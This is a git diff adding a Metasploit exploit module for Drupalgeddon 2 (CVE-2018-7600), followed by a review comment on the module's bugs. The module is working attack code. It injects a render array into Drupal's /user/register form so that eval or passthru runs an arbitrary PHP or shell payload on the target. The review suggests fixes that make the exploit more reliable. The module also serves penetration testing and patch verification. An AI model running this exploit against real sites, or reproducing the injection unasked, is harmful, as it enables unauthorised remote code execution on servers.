diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
new file mode 100644
index 0000000000000..979dda4ad5427
--- /dev/null
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Drupal Drupalgeddon 2',
+ 'Description' => %q{
+ This module exploits a vulnerability.
+ },
+ 'Author' => [
+ 'Jasper Mattsson', # Vuln discovery
+ 'a2u', # PoC exploit
+ 'Nixawk', # PoC exploit
+ 'wvu' # Metasploit module
+ ],
+ 'References' => [
+ ['CVE', '2018-7600'],
+ ['URL', 'https://www.drupal.org/sa-core-2018-002'],
+ ['URL', 'https://greysec.net/showthread.php?tid=2912'],
+ ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],
+ ['URL', 'https://github.com/a2u/CVE-2018-7600'],
+ ['URL', 'https://github.com/nixawk/labs/issues/19']
+ ],
+ 'DisclosureDate' => 'Mar 28 2018',
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['php', 'unix'],
+ 'Arch' => [ARCH_PHP, ARCH_CMD],
+ 'Privileged' => false,
+ 'Targets' => [
+ ['Drupal < 7.58, < 8.3.9, < 8.4.6, < 8.5.1', {}]
+ ],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options([
+ OptString.new('TARGETURI', [true, 'Path to Drupal install', '/'])
+ ])
+ end
+
+ def check
+ token = Rex::Text.rand_text_alphanumeric(8..42)
+
+ res = exploit(func: 'passthru', code: "echo #{token}")
+
+ if res && res.code == 200 && res.body.include?(token)
+ return CheckCode::Vulnerable
+ end
+
+ CheckCode::Safe
+ end
+
+ def exploit(func: 'eval', code: payload.encoded, output: false)
+ if payload && payload.arch.first == ARCH_CMD
+ # TODO: passthru() may be disabled, so try others
+ func = 'passthru'
+ output = true
+ end
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => '/user/register',
+ 'vars_get' => {
+ 'element_parents' => 'account/mail/#value',
+ 'ajax_form' => 1,
+ '_wrapper_format' => 'drupal_ajax'
+ },
+ 'vars_post' => {
+ 'form_id' => 'user_register_form',
+ '_drupal_ajax' => 1,
+ 'mail[#type]' => 'markup',
+ 'mail[#post_render][]' => func,
+ 'mail[#markup]' => code
+ }
+ )
+
+ if res.nil? || res.code != 200
+ fail_with(Failure::UnexpectedReply, res.inspect)
+ end
+
+ if output
+ vprint_status('Output from target:')
+ print_line(res.body)
+ end
+
+ res
+ end
+
+end
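Review bot: The request in `exploit` hard-codes `'uri' => '/user/register'`, so the `TARGETURI` option registered in `initialize` is never honoured and a Drupal install under a sub-path is neither detected by `check` nor exploited; it should be `'uri' => normalize_uri(target_uri.path, 'user', 'register'),`. A second consequence of routing `check` through `exploit` is that the `fail_with(Failure::UnexpectedReply, ...)` branch raises on any non-200 reply, so `check` aborts instead of returning `CheckCode::Safe` and its own `res && res.code == 200` guard is unreachable; either `check` should issue the request itself or `exploit` should take a flag that turns the failure into `CheckCode::Unknown`. The `res.inspect` passed to `fail_with` also dumps the entire response object (headers and body) into the failure message, where `res.code` with a short status line would be enough. Note too that `check` is intrusive — it executes `passthru("echo <token>")` on the target — which deserves a comment such as `# Intrusive check: executes a command on the target` above the `exploit(func: 'passthru', ...)` call, and the `# TODO: passthru() may be disabled` remark is a known gap since `check` will report Safe on a vulnerable host where `passthru` is in `disable_functions`.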